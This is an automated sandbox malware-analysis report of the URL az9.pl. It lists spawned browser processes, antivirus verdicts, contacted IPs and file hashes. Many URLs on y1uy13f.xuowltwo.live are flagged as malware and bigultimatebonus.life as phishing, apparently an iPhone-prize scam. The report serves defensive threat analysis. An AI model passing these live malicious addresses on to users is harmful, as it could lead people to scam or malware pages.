Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6128 --field-trial-handle=1980,i,12541706661546956868,10376714994367635285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1980,i,12541706661546956868,10376714994367635285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6128 --field-trial-handle=1980,i,12541706661546956868,10376714994367635285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection		1
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
http://az9.pl/0%Avira URL Cloudsafe
http://az9.pl/0%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
y1uy13f.xuowltwo.live7%VirustotalBrowse
jsontdsexit2.com1%VirustotalBrowse
bigultimatebonus.life14%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
jsdelivr.map.fastly.net0%VirustotalBrowse
az9.pl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/iphone14pro.png100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box_closed.png100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr3.jpg100%Avira URL Cloudmalware
https://az9.pl/0%Avira URL Cloudsafe
https://bigultimatebonus.life/favicon.ico100%Avira URL Cloudphishing
https://y1uy13f.xuowltwo.live/media/mainstream/icon.js100%Avira URL Cloudmalware
https://bigultimatebonus.life/favicon.ico0%VirustotalBrowse
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/2.js100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/like.png100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/top_red.png100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr6.jpg100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/sound.js100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr2.jpg100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr11.jpg100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box_open.png100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_2.css100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box-iphone14pro.png100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/l.png100%Avira URL Cloudmalware
https://jsontdsexit2.com/ExtService.svc/getextparams0%Avira URL Cloudsafe
https://y1uy13f.xuowltwo.live/media/mainstream/flag-icon/css/flag-icon.css100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_1.js100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr1.jpg100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_3.js100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr5.jpg100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr4.jpg100%Avira URL Cloudmalware
https://jsontdsexit2.com/ExtService.svc/getextparams2%VirustotalBrowse
https://xuowltwo.live/crhhigmk/100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/flag-icon/flags/1x1/us.svg100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/u.js100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102.css100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/x1.png100%Avira URL Cloudmalware
https://y1uy13f.xuowltwo.live/media/mainstream/alert.mp3100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.65.229
truefalseunknown
y1uy13f.xuowltwo.live
185.155.184.55
truefalseunknown
accounts.google.com
142.251.16.84
truefalse
    		high
    jsontdsexit2.com
    		136.243.216.235
    		truefalseunknown
    www.google.com
    		142.250.80.100
    		truefalse
      		high
      clients.l.google.com
      		142.250.64.110
      		truefalse
        		high
        az9.pl
        		172.67.135.33
        		truefalseunknown
        fp2e7a.wpc.phicdn.net
        		192.229.211.108
        		truefalseunknown
        bigultimatebonus.life
        		185.155.184.32
        		truefalseunknown
        clients2.google.com
        		unknown
        		unknownfalse
          		high
          cdn.jsdelivr.net
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.bundle.min.jsfalse
              		high
              https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box_closed.pngfalse
              • Avira URL Cloud: malware
              		unknown
              https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3Dfalse
                		unknown
                https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                  		high
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/iphone14pro.pngfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr3.jpgfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://az9.pl/false
                  • Avira URL Cloud: safe
                  		unknown
                  https://bigultimatebonus.life/favicon.icofalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/icon.jsfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/2.jsfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/like.pngfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/top_red.pngfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/sound.jsfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr6.jpgfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr2.jpgfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box_open.pngfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr11.jpgfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_2.cssfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/l.pngfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box-iphone14pro.pngfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://jsontdsexit2.com/ExtService.svc/getextparamsfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/flag-icon/css/flag-icon.cssfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_1.jsfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr1.jpgfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_3.jsfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://bigultimatebonus.life/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkrufalse
                    		unknown
                    https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr5.jpgfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr4.jpgfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://y1uy13f.xuowltwo.live/media/mainstream/flag-icon/flags/1x1/us.svgfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1false
                      		high
                      https://y1uy13f.xuowltwo.live/media/mainstream/u.jsfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102.cssfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/x1.pngfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://y1uy13f.xuowltwo.live/media/mainstream/alert.mp3false
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://cdn.jsdelivr.net/npm/bootstrapchromecache_82.1.drfalse
                        		high
                        https://getbootstrap.com/)chromecache_79.1.drfalse
                          		high
                          https://github.com/twbs/bootstrap/graphs/contributors)chromecache_79.1.drfalse
                            		high
                            https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_79.1.drfalse
                              		high
                              https://xuowltwo.live/crhhigmk/chromecache_96.1.drfalse
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.155.184.32
                              		bigultimatebonus.lifeSwitzerland
                              		44160INTERNETONEInternetServicesProviderITfalse
                              185.155.186.25
                              		unknownSwitzerland
                              		6898INTERNETONE_CHfalse
                              185.155.184.55
                              		y1uy13f.xuowltwo.liveSwitzerland
                              		44160INTERNETONEInternetServicesProviderITfalse
                              142.250.80.100
                              		www.google.comUnited States
                              		15169GOOGLEUSfalse
                              151.101.65.229
                              		jsdelivr.map.fastly.netUnited States
                              		54113FASTLYUSfalse
                              136.243.216.235
                              		jsontdsexit2.comGermany
                              		24940HETZNER-ASDEfalse
                              104.21.26.13
                              		unknownUnited States
                              		13335CLOUDFLARENETUSfalse
                              142.250.64.110
                              		clients.l.google.comUnited States
                              		15169GOOGLEUSfalse
                              239.255.255.250
                              		unknownReserved
                              		unknownunknownfalse
                              142.251.16.84
                              		accounts.google.comUnited States
                              		15169GOOGLEUSfalse

                              Private

                              IP
                              192.168.2.4

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1396696
                              Start date and time:2024-02-22 08:08:44 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 13s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:browseurl.jbs
                              Sample URL:http://az9.pl/
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal56.win@20/82@22/11
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 142.251.40.131, 34.104.35.123, 142.251.40.234, 142.251.40.163, 13.85.23.86, 72.21.81.240, 192.229.211.108, 13.95.31.18, 52.165.165.26
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ajax.googleapis.com, fonts.gstatic.com, slscr.update.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtSetInformationFile calls found.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASNs

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              Chrome Cache Entry: 100

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:assembler source, ASCII text
                              Category:downloaded
                              Size (bytes):7969
                              Entropy (8bit):4.945234232673543
                              Encrypted:false
                              SSDEEP:192:JHURZTVWkKGcokYhQIrPEyqG3ypGdvOn5hk:J0RZTN
                              MD5:9A13F3506156BF7084AA380C75FDA671
                              SHA1:117AB6DE499A40ABBFE8B7C56A6F40D812F0E309
                              SHA-256:FE71A9AA3271DD1850F74BBD853F9A9FAEDA64350652141C2FF6EB4DD8187AD5
                              SHA-512:2FDD4BF837910EE3E85D87995F6F21C1C827EA77D2237BD5234DEAB2B5BD9BB2F3AC430281E3AFC1C43DD3469E7E296A3E4D602ED5A54489977A3754426F0030
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_2.css
                              Preview:.:root {. --blue: #007bff;. --indigo: #6610f2;. --purple: #6f42c1;. --pink: #e83e8c;. --red: #dc3545;. --orange: #fd7e14;. --yellow: #ffc107;. --green: #28a745;. --teal: #20c997;. --cyan: #17a2b8;. --white: #fff;. --gray: #6c757d;. --gray-dark: #343a40;. --primary: #007bff;. --secondary: #6c757d;. --success: #28a745;. --info: #17a2b8;. --warning: #ffc107;. --danger: #dc3545;. --light: #f8f9fa;. --dark: #343a40;. --breakpoint-xs: 0;. --breakpoint-sm: 576px;. --breakpoint-md: 768px;. --breakpoint-lg: 992px;. --breakpoint-xl: 1200px;. --font-family-sans-serif: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";. --font-family-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace.}..*,::after,::before {. box-sizing: border-box.}..html {. font-famil

                              Chrome Cache Entry: 101

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 15 x 14, 8-bit colormap, non-interlaced
                              Category:downloaded
                              Size (bytes):357
                              Entropy (8bit):6.955852983842003
                              Encrypted:false
                              SSDEEP:6:6v/lhPVtHEfao9uB8R0YYdtuKzMbZjOwpxDNL+G8koNIhRugd2NVwb9RQk/mPZ+0:6v/7PmaDaR0YYPgZPn6BNBcd/mc0Sm7
                              MD5:17586A0AEB3F7B2AA7FB15A9251FBCD4
                              SHA1:6ADFFAD1183C93BC0DC114C89C77365734EC0DD6
                              SHA-256:8BF8DC3A4B6F7E4FA2A6FA74495C212F37A301311980CBC758050993ED9C07E1
                              SHA-512:5BF6CADF6B0BBEDF1BD7964386CC8807128C953CC1CF8DF4515BF4E0980AC3FD9EA8857E1BAA3A87DDDEE16CB97DD4BF3D6B52D8F1E4657E5956727E93DB0351
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/like.png
                              Preview:.PNG........IHDR..............T......PLTE........0\m..........;H...i.......A....Tb....=K.uz.Y`.<I.FR.5D...F.8.z~.]k................>L..&w"5|......Pc.......gx.Vi.E\.....Iv.b...!tRNS.......rF......|xbE<.........i".#....rIDAT..u....@..a.8...(..Vvx...M ....~I.u..m.xj...5..f>..G....,B......T..g..#.;..Kuz9 p.oW..$.......+9.......h...&X=....Z.....IEND.B`.

                              Chrome Cache Entry: 102

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Monaural
                              Category:dropped
                              Size (bytes):8802
                              Entropy (8bit):5.5946484836211505
                              Encrypted:false
                              SSDEEP:192:JN+X8ssZf/IQc5Vkm77EheIp9mLOrEZoz:vS2/PKNxdSnz
                              MD5:6D2D3DA2EA28ACE816FA4A138829DC18
                              SHA1:606E0EC3D7FB05C69F16233CFE1FF0A0EE760505
                              SHA-256:D79BC81189750262716692ADE6CC4D6FB6C4FBC4AA01C2B9D0AA67E5788821FC
                              SHA-512:69B4B77A4233D081DEECA7A19F9234C24AEAB11390988C222119356F5BAD406AED28C0EC25E9881031B51A930171F52C954F376E635DEFE10F244530D749895E
                              Malicious:false
                              Reputation:low
                              Preview:ID3.......TCON.......(12)..............+...dp ..WJ.m....'e.p..I...._d.0..........G(d.L].m..#l..B....oA....W...6.R.......`.H.>(r....nj d.h..0t."D..o..FX.!..LF.....Aw#....Eb.i..O.....rH......0..%.....w.v*.j...\V.k.H.8..{).[.....V".......?r#a.>.e.......7....s....|....N..B.ZK........M..s......E3.(..fN.!..eN.$...8d...&...K7.....Z.X....H/.........-..>...&.J....n.4l....K)C.y.@...}.'3_......t..N.J.Rj1...../8...8Q.J.E..]4.9..}.m...69.,.0Hz........j..tC!".f..$0 ....Z., ....0........K.......j/Lp.c.H.................~..p..""..'A.&.).......4.M9.M.....3`.4 c./.....4.......u......F.p.........&.X..........M...@.R+....0.@.Ep..a....`.......&.. (.q........<.D.........`.......*....r...`...@......`......&0.@......|0...(Z7>.0.@....',....Yr..{..h.4ol....@.............)0.{y./.~.J..>.....4....b..M.x.g.Vo..u.S!....g.f.Y..]...1..O.d+.H....le.!..3.................!4 .....9.Bw.w.%.NnQ..-(O....Y..Eh........X.0V.D...&.6...e'.^.3g.9f...."S....2.I.Q...2..K...a..XT&.<~.D2lpt..ap...tdOLQ.

                              Chrome Cache Entry: 103

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65451)
                              Category:downloaded
                              Size (bytes):89476
                              Entropy (8bit):5.2896589255084425
                              Encrypted:false
                              SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                              MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                              SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                              SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                              SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                              Malicious:false
                              Reputation:low
                              URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                              Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

                              Chrome Cache Entry: 104

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 440 x 514, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):37189
                              Entropy (8bit):7.955926552561113
                              Encrypted:false
                              SSDEEP:768:akPDzEVmtzfvOsg15O71EkSj0LIAuexgs150zo8iS0nyFt:aerfgi1EkSjCpx7r8p0n4t
                              MD5:2F6BFED27C86FB5B0CF0796E73089FB0
                              SHA1:BE5C1A83CB372816542E8F92E75FDDCC12872D42
                              SHA-256:601790639EDD8B031101566F42F5CA7BB57D1FD090AFF2783F7A5F5A1CEB0084
                              SHA-512:73C94D4869164E9D6F0B808FF7EC762B8B05C68333C4424C939D18630B17EAA99644B585520655C9ECDA3A4998487B8A65ECA3CD5840289E92831972DB33CEFC
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR...............(.....PLTE...wtr...,+)............~~|.........b_^khg...KJH[YX875wutTRP.........-+)1/.*('531A?>><:865ECB;97QOM...JHFMKJ...'%$..................VTRTQO$"!...YVTsol............fb`\YW......c_\_\Y...njh .....jfc.......................#.............!}{y.....................)..#! 0..&..1%$5..*........,.)@."9..$<H.............'3.!,+):......-:.........D\h...2/?74G......y....Meq.....-DO.4@...|q...I....6R...3LX..1..._w.SL_...u..tj}ldx......Vny.?]}..KEXD?Q......>:K..<g..<S^n..`Xl..;YSef^r.........J.....78U"%C.Hi....'W.......Su+,G...............6I...._....1;g@A^...).Rr.....EP}...XZ{z..xx.be.*3^d..2Tg...Y...........qn..N.HIi.o.5_tRQoDi|....Mc.@TPt.!3j...........y.....'?y...Pe.>Y.<Dld.....h{.5Gzi.....i..$FWgo.}........R\.8a.y...XrDq.V..Wp.O..Aw.L..2..H.._..4k..f.(v.5..|}.'.......tRNS..9..!.b..YN....s.....ahj....IDATx...n.F...m.U.lVM.../..H...l... U...0.z.J..O.7......pY...F......[..?....q~..93N...7...K~.=z...X..1..K...?.n..r\.......=.?`8'...e.....h...

                              Chrome Cache Entry: 105

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 440 x 514, 8-bit colormap, non-interlaced
                              Category:downloaded
                              Size (bytes):37189
                              Entropy (8bit):7.955926552561113
                              Encrypted:false
                              SSDEEP:768:akPDzEVmtzfvOsg15O71EkSj0LIAuexgs150zo8iS0nyFt:aerfgi1EkSjCpx7r8p0n4t
                              MD5:2F6BFED27C86FB5B0CF0796E73089FB0
                              SHA1:BE5C1A83CB372816542E8F92E75FDDCC12872D42
                              SHA-256:601790639EDD8B031101566F42F5CA7BB57D1FD090AFF2783F7A5F5A1CEB0084
                              SHA-512:73C94D4869164E9D6F0B808FF7EC762B8B05C68333C4424C939D18630B17EAA99644B585520655C9ECDA3A4998487B8A65ECA3CD5840289E92831972DB33CEFC
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/iphone14pro.png
                              Preview:.PNG........IHDR...............(.....PLTE...wtr...,+)............~~|.........b_^khg...KJH[YX875wutTRP.........-+)1/.*('531A?>><:865ECB;97QOM...JHFMKJ...'%$..................VTRTQO$"!...YVTsol............fb`\YW......c_\_\Y...njh .....jfc.......................#.............!}{y.....................)..#! 0..&..1%$5..*........,.)@."9..$<H.............'3.!,+):......-:.........D\h...2/?74G......y....Meq.....-DO.4@...|q...I....6R...3LX..1..._w.SL_...u..tj}ldx......Vny.?]}..KEXD?Q......>:K..<g..<S^n..`Xl..;YSef^r.........J.....78U"%C.Hi....'W.......Su+,G...............6I...._....1;g@A^...).Rr.....EP}...XZ{z..xx.be.*3^d..2Tg...Y...........qn..N.HIi.o.5_tRQoDi|....Mc.@TPt.!3j...........y.....'?y...Pe.>Y.<Dld.....h{.5Gzi.....i..$FWgo.}........R\.8a.y...XrDq.V..Wp.O..Aw.L..2..H.._..4k..f.(v.5..|}.'.......tRNS..9..!.b..YN....s.....ahj....IDATx...n.F...m.U.lVM.../..H...l... U...0.z.J..O.7......pY...F......[..?....q~..93N...7...K~.=z...X..1..K...?.n..r\.......=.?`8'...e.....h...

                              Chrome Cache Entry: 56

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):7481
                              Entropy (8bit):4.414898019570039
                              Encrypted:false
                              SSDEEP:192:i8o8SCyiQZgoDe3+3nCoibZ/QdBc17DFT4TJfZ52Adg8F5UgdnJze0EpJiSl6fVY:i8oSpBBT4Tx2Adg8F5UgdnQ0Ep36fVY
                              MD5:AE061C759F20723E38540A261F2127D7
                              SHA1:C09D8C4C6C7B2E125D92940BFA3F5930B51290BC
